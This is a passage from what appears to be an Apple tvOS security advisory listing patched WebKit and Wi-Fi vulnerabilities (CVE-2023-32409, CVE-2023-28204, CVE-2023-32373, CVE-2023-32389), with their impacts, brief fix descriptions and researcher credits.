
Impact: A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

WebKit Bugzilla: 255350  
CVE-2023-32409: Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 254930  
CVE-2023-28204: an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 254840  
CVE-2023-32373: an anonymous researcher

**Wi-Fi**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32389: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Tag

#webkit